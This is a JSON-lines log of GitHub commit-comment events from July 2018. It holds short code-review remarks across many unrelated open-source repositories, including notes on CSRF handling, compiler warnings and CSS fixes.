{"id":"7919779241","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29598794,"position":51,"line":51,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"ed778e73bbf2b71e3a3527c3e3bfbb480d2bdd8a","created_at":"2018-07-04T18:55:57Z","updated_at":"2018-07-04T18:55:57Z","author_association":"NONE","body":"error message will help debug cause...."}},"created_at":"2018-07-04T18:55:57Z"}
{"id":"7919780736","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29598796,"position":30,"line":30,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"ed778e73bbf2b71e3a3527c3e3bfbb480d2bdd8a","created_at":"2018-07-04T18:56:31Z","updated_at":"2018-07-04T18:56:31Z","author_association":"NONE","body":"error message will help debug cause...."}},"created_at":"2018-07-04T18:56:31Z"}
{"id":"7919780808","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29598798,"position":null,"line":null,"path":null,"commit_id":"369ed9573035500c0fba967cb6c29e8093ccd523","created_at":"2018-07-04T18:56:33Z","updated_at":"2018-07-04T18:56:33Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#ci-1](https://dashboard.pantheon.io/sites/96ceaa07-39e4-45d7-8257-80448616481e#ci-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-04T18:56:33Z"}
{"id":"7919781396","type":"CommitCommentEvent","actor":{"login":"iwasthesword"},"repo":{"name":"ForaDoEixo/MapasBuilder"},"payload":{"comment":{"id":29598800,"position":null,"line":null,"path":null,"commit_id":"a59a0cf8fe7274cafb39f1323926efce2dec26c5","created_at":"2018-07-04T18:56:49Z","updated_at":"2018-07-04T18:56:49Z","author_association":"CONTRIBUTOR","body":"closes #19"}},"created_at":"2018-07-04T18:56:49Z"}
{"id":"7919785535","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29598806,"position":25,"line":25,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"ed778e73bbf2b71e3a3527c3e3bfbb480d2bdd8a","created_at":"2018-07-04T18:58:30Z","updated_at":"2018-07-04T18:58:30Z","author_association":"NONE","body":"should not have desired_num_of_engines; see earlier pooling concept description, of 1:N and M threads"}},"created_at":"2018-07-04T18:58:30Z"}
{"id":"7919788287","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ds-vologdin/learning_courses_site"},"payload":{"comment":{"id":29598810,"position":9,"line":9,"path":"courses/templates/base.html","commit_id":"6100b14728e11262c74c351cc170f5e45a903581","created_at":"2018-07-04T18:59:33Z","updated_at":"2018-07-04T18:59:33Z","author_association":"NONE","body":"На будущее favicon.ico лучше класть в корень. Неокоторые браузеры за фавиконом лезут в корень вне зависимости от того, что зедсь написано, а потом только за тем что здесь указано."}},"created_at":"2018-07-04T18:59:33Z"}
{"id":"7919791708","type":"CommitCommentEvent","actor":{"login":"375gnu"},"repo":{"name":"CelestiaProject/Celestia"},"payload":{"comment":{"id":29598825,"position":null,"line":null,"path":null,"commit_id":"dcaa0a7258cd64df2f760efcd5cbd1b3d4e6601a","created_at":"2018-07-04T19:00:49Z","updated_at":"2018-07-04T19:00:49Z","author_association":"CONTRIBUTOR","body":"Better `if (c_p[0] == 'y' || c_p[0] == 'Y')`\r\n\r\nAnd please don't delete whitespaces between `if` and `(`."}},"created_at":"2018-07-04T19:00:49Z"}
{"id":"7919792052","type":"CommitCommentEvent","actor":{"login":"Kindaalmouslt"},"repo":{"name":"Kindaalmouslt/course-collaboration-travel-plans"},"payload":{"comment":{"id":29598827,"position":13,"line":21,"path":"index.html","commit_id":"574c4564eb42920fbfa7843774dd6ec62c82e963","created_at":"2018-07-04T19:00:57Z","updated_at":"2018-07-04T19:00:57Z","author_association":"OWNER","body":"<h3>Belize</<h3>\r\n<h3>Paris</h3>\r\n      </div>\r\n         </div>\r\n     </div>\r\n+             "}},"created_at":"2018-07-04T19:00:57Z"}
{"id":"7919794700","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"coccinelle/coccinelle"},"payload":{"comment":{"id":29598832,"position":74,"line":74,"path":"make-release.sh","commit_id":"f27fe1749884fbd98e468e5f4f3f3d79be388990","created_at":"2018-07-04T19:01:55Z","updated_at":"2018-07-04T19:01:55Z","author_association":"CONTRIBUTOR","body":"I suggest to replace the semicolon by a double ampersand as the command control operator."}},"created_at":"2018-07-04T19:01:55Z"}
{"id":"7919796047","type":"CommitCommentEvent","actor":{"login":"smortex"},"repo":{"name":"ccin2p3/puppet-riemann"},"payload":{"comment":{"id":29598833,"position":null,"line":null,"path":null,"commit_id":"d48bd0cf6358853f0edf1ffb732ba96e2f16f6e6","created_at":"2018-07-04T19:02:27Z","updated_at":"2018-07-04T19:02:27Z","author_association":"CONTRIBUTOR","body":"According to https://puppet.com/docs/puppet/5.0/system_requirements.html#prerequisites :\r\n> We currently only test and package with 2.4.x versions of Ruby, therefore you should only use this version."}},"created_at":"2018-07-04T19:02:27Z"}
{"id":"7919796343","type":"CommitCommentEvent","actor":{"login":"AnnyCaroline"},"repo":{"name":"ceu-lang/ceu-maker"},"payload":{"comment":{"id":29598834,"position":null,"line":null,"path":null,"commit_id":"6a167d29f8be45d8095144231de80660107e4572","created_at":"2018-07-04T19:02:34Z","updated_at":"2018-07-04T19:02:34Z","author_association":"COLLABORATOR","body":"Related to [AnnyCaroline/ceu-maker-gsoc/commit/cd832c2](https://github.com/AnnyCaroline/ceu-maker-gsoc/commit/cd832c2c76b59447e0f22e34ea8cfa9323131ae4)"}},"created_at":"2018-07-04T19:02:34Z"}
{"id":"7919799168","type":"CommitCommentEvent","actor":{"login":"hlissner"},"repo":{"name":"hlissner/doom-emacs"},"payload":{"comment":{"id":29598846,"position":null,"line":null,"path":null,"commit_id":"d0eaa0af1e4adf706cbc5cc8299097cbadea0f10","created_at":"2018-07-04T19:03:40Z","updated_at":"2018-07-04T19:03:40Z","author_association":"OWNER","body":"@UndeadKernel Agreed. This is not a permanent (or ideal) solution. I had problems with the dashboard looking up keybinds reliably at startup and didn't have time to delve into a proper solution yet. I will revisit this soon, before 2.1 goes up."}},"created_at":"2018-07-04T19:03:40Z"}
{"id":"7919800543","type":"CommitCommentEvent","actor":{"login":"crielly"},"repo":{"name":"cloudreach/sceptre"},"payload":{"comment":{"id":29598852,"position":null,"line":null,"path":null,"commit_id":"8cd327077614ef2a44be846d8d973c18de86ff56","created_at":"2018-07-04T19:04:15Z","updated_at":"2018-07-04T19:04:15Z","author_association":"NONE","body":"It might be worth considering a cross-region use-case for SSM - ie retrieving values from a different region. If you have a parameter available in only one region and SSM's API is down for that region, you effectively lose the ability to deploy or update that stack, no?"}},"created_at":"2018-07-04T19:04:15Z"}
{"id":"7919800605","type":"CommitCommentEvent","actor":{"login":"smortex"},"repo":{"name":"ccin2p3/puppet-riemann"},"payload":{"comment":{"id":29598853,"position":4,"line":36,"path":".travis.yml","commit_id":"d48bd0cf6358853f0edf1ffb732ba96e2f16f6e6","created_at":"2018-07-04T19:04:16Z","updated_at":"2018-07-04T19:04:16Z","author_association":"CONTRIBUTOR","body":"Don't you mean `~> 5.0`?  Or do you want to try Puppet 6 as soon as it's shipped?"}},"created_at":"2018-07-04T19:04:16Z"}
{"id":"7919800656","type":"CommitCommentEvent","actor":{"login":"ylorenzana"},"repo":{"name":"ylorenzana/node-express-api-auth"},"payload":{"comment":{"id":29598854,"position":7,"line":7,"path":"server/middleware/csrfCheck.js","commit_id":"2e7f25251787ef4d711810334301b7cd4c0a6c4b","created_at":"2018-07-04T19:04:17Z","updated_at":"2018-07-04T19:04:17Z","author_association":"OWNER","body":"Yeah I don't think checking it is necessary. According to OWASP, csrf tokens are only required for state-changing operations, so I don't think get requests should require csrf auth."}},"created_at":"2018-07-04T19:04:17Z"}
{"id":"7919800672","type":"CommitCommentEvent","actor":{"login":"SteveMoto"},"repo":{"name":"vlachoudis/bCNC"},"payload":{"comment":{"id":29598855,"position":null,"line":null,"path":null,"commit_id":"7d780a729102f0244c6a43bf68c381be87f22166","created_at":"2018-07-04T19:04:18Z","updated_at":"2018-07-04T19:04:18Z","author_association":"CONTRIBUTOR","body":"on my test / screenshot machine I have only one basic installation (without numpy). Your new plugins will not work on this machine and certainly not on some other machines of other users either.\r\nIt should:\r\n- numpy (no Python standard library) as requirements for bCNC\r\nor:\r\n- like other libraries (eg imagetogcode) / modules (eg Camera) / Plugins (eg heightmap) check if numpy is present / installed and otherwise indicate that it needs to be installed ...\r\n\r\nGreetz\r\nSteve"}},"created_at":"2018-07-04T19:04:18Z"}
{"id":"7919800896","type":"CommitCommentEvent","actor":{"login":"clsnxo"},"repo":{"name":"Ciborg-Ascend/Trivia-mec"},"payload":{"comment":{"id":29598856,"position":null,"line":null,"path":null,"commit_id":"b91a270d285d21533822f0cc79798261d2be0d0c","created_at":"2018-07-04T19:04:24Z","updated_at":"2018-07-04T19:04:24Z","author_association":"NONE","body":"hola, puedes facilitar el modelo de base de datos o el schema.sql listo.\r\n\r\n\r\nsaludos"}},"created_at":"2018-07-04T19:04:24Z"}
{"id":"7919805773","type":"CommitCommentEvent","actor":{"login":"ylorenzana"},"repo":{"name":"ylorenzana/node-express-api-auth"},"payload":{"comment":{"id":29598869,"position":9,"line":9,"path":"server/middleware/csrfCheck.js","commit_id":"2e7f25251787ef4d711810334301b7cd4c0a6c4b","created_at":"2018-07-04T19:06:23Z","updated_at":"2018-07-04T19:06:23Z","author_association":"OWNER","body":"Tracking of login attempts and csrf attempts is definitely a priority in my todo list for the project. I believe rate limiting/throttling should be handled by a reverse proxy like nginx in production instead of using some of the node 3rd party libraries.\r\nWouldn't sending back the valid csrf token defeat the purpose though? I'm not sure I follow"}},"created_at":"2018-07-04T19:06:23Z"}
{"id":"7919808867","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29598874,"position":12,"line":99,"path":"application/models/Question.php","commit_id":"ae2a46cd5c33738b621bcd23360d8c4db7402830","created_at":"2018-07-04T19:07:41Z","updated_at":"2018-07-04T19:07:41Z","author_association":"COLLABORATOR","body":"The fix is strange, SQ : seems to be Sub Question. But the rules about question not starting with number must be set only for question, not for subquestion : https://github.com/LimeSurvey/LimeSurvey/blob/4dcc3bdf7e3dff8856ae12d5f4614225fd969ede/application/models/Question.php#L148\r\n\r\nElse : since i see bug fix rehappen after some year, i never sure it's a joke …"}},"created_at":"2018-07-04T19:07:41Z"}
{"id":"7919809310","type":"CommitCommentEvent","actor":{"login":"gabebw"},"repo":{"name":"teoljungberg/dotfiles"},"payload":{"comment":{"id":29598875,"position":null,"line":null,"path":null,"commit_id":"6108034cc688e57cc2aa91ace3fe8a8750c1f91e","created_at":"2018-07-04T19:07:51Z","updated_at":"2018-07-04T19:07:51Z","author_association":"NONE","body":"❤️ "}},"created_at":"2018-07-04T19:07:51Z"}
{"id":"7919811836","type":"CommitCommentEvent","actor":{"login":"rockyluke"},"repo":{"name":"utsl42/drac-kvm"},"payload":{"comment":{"id":29598878,"position":null,"line":null,"path":null,"commit_id":"8c681c4d8103ea7bfa137ea7ce126c02777a86a9","created_at":"2018-07-04T19:08:53Z","updated_at":"2018-07-04T19:08:53Z","author_association":"NONE","body":"Just added it => https://github.com/rockyluke/drac-kvm/commit/4686e3d2cc3c68989835d10ac4e89ef00af45d76\r\n\r\nThanks."}},"created_at":"2018-07-04T19:08:53Z"}
{"id":"7919812066","type":"CommitCommentEvent","actor":{"login":"AnirudhaRamesh"},"repo":{"name":"coala/corobo"},"payload":{"comment":{"id":29598879,"position":null,"line":null,"path":null,"commit_id":"9b3eb25a8ba9955a545660fb08391e5d95d9cbf6","created_at":"2018-07-04T19:08:59Z","updated_at":"2018-07-04T19:08:59Z","author_association":"NONE","body":"Emojis for rage, heart eyes, cake, and penguin have been added. 😡😍🎂🐧"}},"created_at":"2018-07-04T19:08:59Z"}
{"id":"7919812101","type":"CommitCommentEvent","actor":{"login":"ThibautRuy"},"repo":{"name":"dceejay/RedMap"},"payload":{"comment":{"id":29598880,"position":null,"line":null,"path":null,"commit_id":"15b8efe6b228c5aec1aac3235d0c871808a07317","created_at":"2018-07-04T19:09:00Z","updated_at":"2018-07-04T19:09:00Z","author_association":"NONE","body":"Is this version already available to update in the node-red palette?"}},"created_at":"2018-07-04T19:09:00Z"}
{"id":"7919814209","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ds-vologdin/learning_courses_site"},"payload":{"comment":{"id":29598882,"position":29,"line":39,"path":"html/main.css","commit_id":"168fc0cecef5a39a9fb3806a87d35acdd3cffbf6","created_at":"2018-07-04T19:09:53Z","updated_at":"2018-07-04T19:09:53Z","author_association":"NONE","body":"Красота)"}},"created_at":"2018-07-04T19:09:53Z"}
{"id":"7919817582","type":"CommitCommentEvent","actor":{"login":"AngleQian"},"repo":{"name":"SHSIDers/oclubs"},"payload":{"comment":{"id":29598892,"position":1,"line":1,"path":"oclubs-tables.sql","commit_id":"6c39814247da4a97b454bba8acde26e8bd52ade4","created_at":"2018-07-04T19:11:14Z","updated_at":"2018-07-04T19:11:14Z","author_association":"CONTRIBUTOR","body":"This is a mistake. Fixed"}},"created_at":"2018-07-04T19:11:14Z"}
{"id":"7919820890","type":"CommitCommentEvent","actor":{"login":"ylorenzana"},"repo":{"name":"ylorenzana/node-express-api-auth"},"payload":{"comment":{"id":29598903,"position":9,"line":11,"path":"server/routes/users.js","commit_id":"2e7f25251787ef4d711810334301b7cd4c0a6c4b","created_at":"2018-07-04T19:12:34Z","updated_at":"2018-07-04T19:12:34Z","author_association":"OWNER","body":"I agree that most post requests should be csrf protected, but the csrf auth __depends__ on a valid session already existing in the server. This would require a rework of the current csrf protection implementation"}},"created_at":"2018-07-04T19:12:34Z"}
{"id":"7919821910","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29598907,"position":null,"line":null,"path":null,"commit_id":"00990367a1e06dd0a4773c9a48f1c820f9c456bc","created_at":"2018-07-04T19:12:59Z","updated_at":"2018-07-04T19:12:59Z","author_association":"COLLABORATOR","body":"See my comment : the rules about question code not starting by a number are only for question, not sub question. Sub question starting by a number is allowed …\r\n\r\nI‘m not at my office , but think a better fix is to set the parent_qid before save the question, no ?"}},"created_at":"2018-07-04T19:12:59Z"}
{"id":"7919822697","type":"CommitCommentEvent","actor":{"login":"ylorenzana"},"repo":{"name":"ylorenzana/node-express-api-auth"},"payload":{"comment":{"id":29598910,"position":11,"line":13,"path":"server/routes/users.js","commit_id":"2e7f25251787ef4d711810334301b7cd4c0a6c4b","created_at":"2018-07-04T19:13:20Z","updated_at":"2018-07-04T19:13:20Z","author_association":"OWNER","body":"Yeah I missed this one, good catch. I'll add a small check to the password"}},"created_at":"2018-07-04T19:13:20Z"}
{"id":"7919822864","type":"CommitCommentEvent","actor":{"login":"vassvik"},"repo":{"name":"odin-lang/Odin"},"payload":{"comment":{"id":29598911,"position":null,"line":null,"path":null,"commit_id":"3b2c8678179a64c2e53e22a1dae50487fb8873e7","created_at":"2018-07-04T19:13:24Z","updated_at":"2018-07-04T19:13:24Z","author_association":"MEMBER","body":"See: https://stackoverflow.com/questions/11900904/wrong-numbers-with-clock-gettime-and-clock-process-cputime-id"}},"created_at":"2018-07-04T19:13:24Z"}
{"id":"7919826366","type":"CommitCommentEvent","actor":{"login":"canerbagci"},"repo":{"name":"HalgrimThadeus/long-read-microbiome"},"payload":{"comment":{"id":29598917,"position":17,"line":59,"path":"src/model/FastAEntry.java","commit_id":"47027ad234f0b0ab7b2210f1fef1a950e831bc60","created_at":"2018-07-04T19:14:48Z","updated_at":"2018-07-04T19:14:48Z","author_association":"COLLABORATOR","body":"come on"}},"created_at":"2018-07-04T19:14:48Z"}
{"id":"7919826955","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29598921,"position":null,"line":null,"path":null,"commit_id":"ca57e4e167dcade8d9294305848125883c21b4c1","created_at":"2018-07-04T19:15:03Z","updated_at":"2018-07-04T19:15:03Z","author_association":"COLLABORATOR","body":"@LouisGac  did you check for PASSTHRU ?"}},"created_at":"2018-07-04T19:15:03Z"}
{"id":"7919828258","type":"CommitCommentEvent","actor":{"login":"franmagneto"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29598928,"position":null,"line":null,"path":null,"commit_id":"7c5845a5a26592598c9380df078766a680a23f06","created_at":"2018-07-04T19:15:31Z","updated_at":"2018-07-04T19:15:31Z","author_association":"NONE","body":"I use native modules on my projects. Do I need to find alternatives to them if I want to upgrade to React Native 0.56.0? This commit sounds odd to me..."}},"created_at":"2018-07-04T19:15:31Z"}
{"id":"7919829306","type":"CommitCommentEvent","actor":{"login":"ylorenzana"},"repo":{"name":"ylorenzana/node-express-api-auth"},"payload":{"comment":{"id":29598930,"position":75,"line":104,"path":"server/routes/users.js","commit_id":"2e7f25251787ef4d711810334301b7cd4c0a6c4b","created_at":"2018-07-04T19:15:55Z","updated_at":"2018-07-04T19:15:55Z","author_association":"OWNER","body":"Yeah I only used it here because I still haven't thought of an example endpoint I could use to showcase the csrf protection. I'll probably add a delete account endpoint which should require csrf protection. I agree that the logout endpoint should not be a GET route, that was a mistake on my part. Fixing it by next commit."}},"created_at":"2018-07-04T19:15:55Z"}
{"id":"7919829353","type":"CommitCommentEvent","actor":{"login":"DarthFutuza"},"repo":{"name":"JKGDevs/JediKnightGalaxies"},"payload":{"comment":{"id":29598931,"position":null,"line":null,"path":null,"commit_id":"8da86ee09a4df4de5421cc60576dadf50ed0497b","created_at":"2018-07-04T19:15:56Z","updated_at":"2018-07-04T19:15:56Z","author_association":"MEMBER","body":"Also forgot to add, increased spawnInvulnerability time a bit, I don't think 3 secs is quite enough if people are base camping (honestly 5-7 secs might be better)."}},"created_at":"2018-07-04T19:15:56Z"}
{"id":"7919830736","type":"CommitCommentEvent","actor":{"login":"MarioIM"},"repo":{"name":"netz-chat/objectdb"},"payload":{"comment":{"id":29598933,"position":null,"line":null,"path":null,"commit_id":"ce7bc33ea37daeb6c630f765faf318dcdf5edc3a","created_at":"2018-07-04T19:16:29Z","updated_at":"2018-07-04T19:16:29Z","author_association":"CONTRIBUTOR","body":"#2 "}},"created_at":"2018-07-04T19:16:29Z"}
{"id":"7919832120","type":"CommitCommentEvent","actor":{"login":"virendra-pathak"},"repo":{"name":"JoeKan/stereoMatching"},"payload":{"comment":{"id":29598936,"position":81,"line":82,"path":"src/PrimalDual.cpp","commit_id":"39c9e68f4e9d127946fcfd36d94c847552e95c34","created_at":"2018-07-04T19:17:02Z","updated_at":"2018-07-04T19:17:02Z","author_association":"COLLABORATOR","body":"why 2 * 640 * 480 and not only 640*480?"}},"created_at":"2018-07-04T19:17:02Z"}
{"id":"7919832527","type":"CommitCommentEvent","actor":{"login":"ylorenzana"},"repo":{"name":"ylorenzana/node-express-api-auth"},"payload":{"comment":{"id":29598939,"position":5,"line":5,"path":"server/utils/utils.js","commit_id":"2e7f25251787ef4d711810334301b7cd4c0a6c4b","created_at":"2018-07-04T19:17:12Z","updated_at":"2018-07-04T19:17:12Z","author_association":"OWNER","body":"I was thinking about adding a parameter to the generateToken function to take in byte size, but I believe both of them generating 16 random bytes shouldn't be a problem"}},"created_at":"2018-07-04T19:17:12Z"}
{"id":"7919835310","type":"CommitCommentEvent","actor":{"login":"brentvatne"},"repo":{"name":"react-navigation/react-navigation"},"payload":{"comment":{"id":29598946,"position":null,"line":null,"path":null,"commit_id":"bc01a4cd5701fd6f73861c14a578131950061f28","created_at":"2018-07-04T19:18:21Z","updated_at":"2018-07-04T19:18:21Z","author_association":"MEMBER","body":"you should use `headerTitle` instead of `title` in that case"}},"created_at":"2018-07-04T19:18:21Z"}
{"id":"7919839215","type":"CommitCommentEvent","actor":{"login":"hturner"},"repo":{"name":"forwards/surveys-public"},"payload":{"comment":{"id":29598948,"position":null,"line":null,"path":null,"commit_id":"cece25d5dded96ddce2ba62854307ffaace2cd29","created_at":"2018-07-04T19:19:55Z","updated_at":"2018-07-04T19:19:55Z","author_association":"MEMBER","body":"Fair comment, thanks."}},"created_at":"2018-07-04T19:19:55Z"}
{"id":"7919840666","type":"CommitCommentEvent","actor":{"login":"diegodelemos"},"repo":{"name":"reanahub/reana-job-controller"},"payload":{"comment":{"id":29598949,"position":null,"line":null,"path":null,"commit_id":"b06ebb57772390272d506fa6fcaa00db4617b32b","created_at":"2018-07-04T19:20:31Z","updated_at":"2018-07-04T19:20:31Z","author_association":"MEMBER","body":"@dinosk true, I will change it once I get home! 🤙🏽"}},"created_at":"2018-07-04T19:20:31Z"}
{"id":"7919861003","type":"CommitCommentEvent","actor":{"login":"LePorcHalal"},"repo":{"name":"LePorcHalal/wricef2-03"},"payload":{"comment":{"id":29599000,"position":null,"line":null,"path":null,"commit_id":"7623fdf0af2ef280c3578b2710a0fc88d5b90051","created_at":"2018-07-04T19:28:52Z","updated_at":"2018-07-04T19:28:52Z","author_association":"OWNER","body":"wtf"}},"created_at":"2018-07-04T19:28:52Z"}
{"id":"7919861967","type":"CommitCommentEvent","actor":{"login":"urievenchen"},"repo":{"name":"urievenchen/speedy-net"},"payload":{"comment":{"id":29599002,"position":null,"line":null,"path":null,"commit_id":"510bf95b64a02bb0bb4194e3bbabcb033f8c74b4","created_at":"2018-07-04T19:29:14Z","updated_at":"2018-07-04T19:29:14Z","author_association":"OWNER","body":"https://github.com/revsys/django-friendship/issues/74\r\nhttps://github.com/revsys/django-friendship/issues/76"}},"created_at":"2018-07-04T19:29:14Z"}
{"id":"7919862182","type":"CommitCommentEvent","actor":{"login":"fairbird"},"repo":{"name":"oscam-emu/oscam-emu"},"payload":{"comment":{"id":29599003,"position":null,"line":null,"path":null,"commit_id":"c90f68685b521ddeb84bce35f84d255840c1e48c","created_at":"2018-07-04T19:29:19Z","updated_at":"2018-07-04T19:29:19Z","author_association":"NONE","body":"Warrning message with in compile with this comment \r\n\r\n> In file included from globals.h:2410:0,\r\n                 from module-emulator-osemu.c:3:\r\nmodule-emulator-osemu.c: In function 'PowervuECM':\r\noscam-log.h:17:55: warning: 'modeCW' may be used uninitialized in this function [-Wmaybe-uninitialized]\r\n #define cs_log(fmt, params...)              cs_log_txt(MODULE_LOG_PREFIX, fmt, ##params)\r\n                                                       ^\r\nmodule-emulator-osemu.c:4392:74: note: 'modeCW' was declared here\r\n  uint8_t nanoCmd, nanoChecksum, keyType, fixedKey, oddKey, bid, csaUsed, modeCW, offsetBody;"}},"created_at":"2018-07-04T19:29:19Z"}
{"id":"7919862783","type":"CommitCommentEvent","actor":{"login":"virendra-pathak"},"repo":{"name":"JoeKan/stereoMatching"},"payload":{"comment":{"id":29599004,"position":58,"line":59,"path":"src/PrimalDual.cpp","commit_id":"39c9e68f4e9d127946fcfd36d94c847552e95c34","created_at":"2018-07-04T19:29:32Z","updated_at":"2018-07-04T19:29:32Z","author_association":"COLLABORATOR","body":"Task4: implement closed form in updateD()"}},"created_at":"2018-07-04T19:29:32Z"}
{"id":"7919863208","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29599006,"position":86,"line":86,"path":"src/runtime/hexagon_dma_pool.cpp","commit_id":"ed778e73bbf2b71e3a3527c3e3bfbb480d2bdd8a","created_at":"2018-07-04T19:29:44Z","updated_at":"2018-07-04T19:29:44Z","author_association":"NONE","body":"error message and must continue to free 'other' engines in the pool, and then return error at end. Otherwise there'll be allocated engines stuck and never freed until hexagon is rebooted."}},"created_at":"2018-07-04T19:29:44Z"}
{"id":"7919867582","type":"CommitCommentEvent","actor":{"login":"haojin2"},"repo":{"name":"mli/gluon-tutorials-zh"},"payload":{"comment":{"id":29599018,"position":23,"line":21,"path":"chapter_introduction/how-to-use.md","commit_id":"167443d1c5e33613747244d0e50dd5995de2174b","created_at":"2018-07-04T19:31:23Z","updated_at":"2018-07-04T19:31:23Z","author_association":"CONTRIBUTOR","body":"这个图里那个用来标示章节的颜色的差别如果是印黑白的书的话可能不是很明显？"}},"created_at":"2018-07-04T19:31:23Z"}
{"id":"7919868826","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ds-vologdin/learning_courses_site"},"payload":{"comment":{"id":29599022,"position":141,"line":145,"path":"html/main.css","commit_id":"168fc0cecef5a39a9fb3806a87d35acdd3cffbf6","created_at":"2018-07-04T19:31:54Z","updated_at":"2018-07-04T19:31:54Z","author_association":"NONE","body":"А этот опчему на картнку не заменён"}},"created_at":"2018-07-04T19:31:54Z"}
{"id":"7919875696","type":"CommitCommentEvent","actor":{"login":"geerzo"},"repo":{"name":"benbaran/adal-angular4"},"payload":{"comment":{"id":29599036,"position":null,"line":null,"path":null,"commit_id":"012a9631489e798423e4bdc181a1d5c142884d9d","created_at":"2018-07-04T19:34:43Z","updated_at":"2018-07-04T19:34:43Z","author_association":"NONE","body":"@benbaran is there a reason you merged in the Pull Requests that fixed various issues by reverting back to adal-angular 1.0.15 and then changed it back to 1.0.17 which seems to be broken when used with this library?"}},"created_at":"2018-07-04T19:34:43Z"}
{"id":"7919882377","type":"CommitCommentEvent","actor":{"login":"Sidney2018"},"repo":{"name":"Sidney2018/Hello_Sailor"},"payload":{"comment":{"id":29599053,"position":null,"line":null,"path":null,"commit_id":"6e1b858ff8324086f3b84f30334b338ff6c53ed2","created_at":"2018-07-04T19:37:21Z","updated_at":"2018-07-04T19:37:21Z","author_association":"OWNER","body":"How to greet a Jolly Jack tar"}},"created_at":"2018-07-04T19:37:21Z"}
{"id":"7919883488","type":"CommitCommentEvent","actor":{"login":"amamory"},"repo":{"name":"lsa-pucrs/donnie-assistive-robot-sw"},"payload":{"comment":{"id":29599055,"position":42,"line":96,"path":"client/vib_belt/vib_belt.cc","commit_id":"6ee2540fdd8aca50eb56ce1ee33b05127c164398","created_at":"2018-07-04T19:37:48Z","updated_at":"2018-07-04T19:37:48Z","author_association":"CONTRIBUTOR","body":"@Geissr na linha 96 nao eh p ser i+22 ao inves de i+8 ?"}},"created_at":"2018-07-04T19:37:48Z"}
{"id":"7919883580","type":"CommitCommentEvent","actor":{"login":"vinicius73"},"repo":{"name":"drianoaz/todo-list"},"payload":{"comment":{"id":29599056,"position":4,"line":3,"path":"src/js/controllers/TodoController.js","commit_id":"07d5699eaf221e774654d43f37c02a6824938576","created_at":"2018-07-04T19:37:51Z","updated_at":"2018-07-04T19:37:51Z","author_association":"CONTRIBUTOR","body":"Por motivos didáticos escolhi uma abordagem diferente"}},"created_at":"2018-07-04T19:37:51Z"}
{"id":"7919886856","type":"CommitCommentEvent","actor":{"login":"heckflosse"},"repo":{"name":"Beep6581/RawTherapee"},"payload":{"comment":{"id":29599061,"position":35,"line":4158,"path":"rtengine/procparams.cc","commit_id":"8c3e14b7f0a128d82369ebcbb88abe3ccb930c7d","created_at":"2018-07-04T19:39:09Z","updated_at":"2018-07-04T19:39:09Z","author_association":"COLLABORATOR","body":"@Thanatomanic \r\nThat would break backwards compatibility"}},"created_at":"2018-07-04T19:39:09Z"}
{"id":"7919888002","type":"CommitCommentEvent","actor":{"login":"amamory"},"repo":{"name":"lsa-pucrs/donnie-assistive-robot-sw"},"payload":{"comment":{"id":29599069,"position":55,"line":108,"path":"client/vib_belt/vib_belt.cc","commit_id":"6ee2540fdd8aca50eb56ce1ee33b05127c164398","created_at":"2018-07-04T19:39:36Z","updated_at":"2018-07-04T19:39:36Z","author_association":"CONTRIBUTOR","body":"@Geissr nao era p ter 3 niveis (A,B e C) ? pq so tem A e B ?\r\n"}},"created_at":"2018-07-04T19:39:36Z"}
{"id":"7919888318","type":"CommitCommentEvent","actor":{"login":"suvayu"},"repo":{"name":"chris-belcher/electrum-personal-server"},"payload":{"comment":{"id":29599070,"position":22,"line":403,"path":"electrumpersonalserver/transactionmonitor.py","commit_id":"2a0d918ac4ac19037846935893807491c77da15d","created_at":"2018-07-04T19:39:44Z","updated_at":"2018-07-04T19:39:44Z","author_association":"NONE","body":"Missed this one"}},"created_at":"2018-07-04T19:39:44Z"}
{"id":"7919889862","type":"CommitCommentEvent","actor":{"login":"lefuturiste"},"repo":{"name":"retrobox/web"},"payload":{"comment":{"id":29599077,"position":null,"line":null,"path":null,"commit_id":"15be1a98711d2920dcc8a9671ea784d4b0b1b893","created_at":"2018-07-04T19:40:23Z","updated_at":"2018-07-04T19:40:23Z","author_association":"MEMBER","body":"lel"}},"created_at":"2018-07-04T19:40:23Z"}
{"id":"7919893133","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ds-vologdin/learning_courses_site"},"payload":{"comment":{"id":29599087,"position":93,"line":371,"path":"html/main_learning_site.html","commit_id":"98f18ca9787950297690ed5ec7674a2e64b7ab3b","created_at":"2018-07-04T19:41:50Z","updated_at":"2018-07-04T19:41:50Z","author_association":"NONE","body":"Я бы сделал бы это доабвлением модификатора .dropdown--uncollapsed"}},"created_at":"2018-07-04T19:41:50Z"}
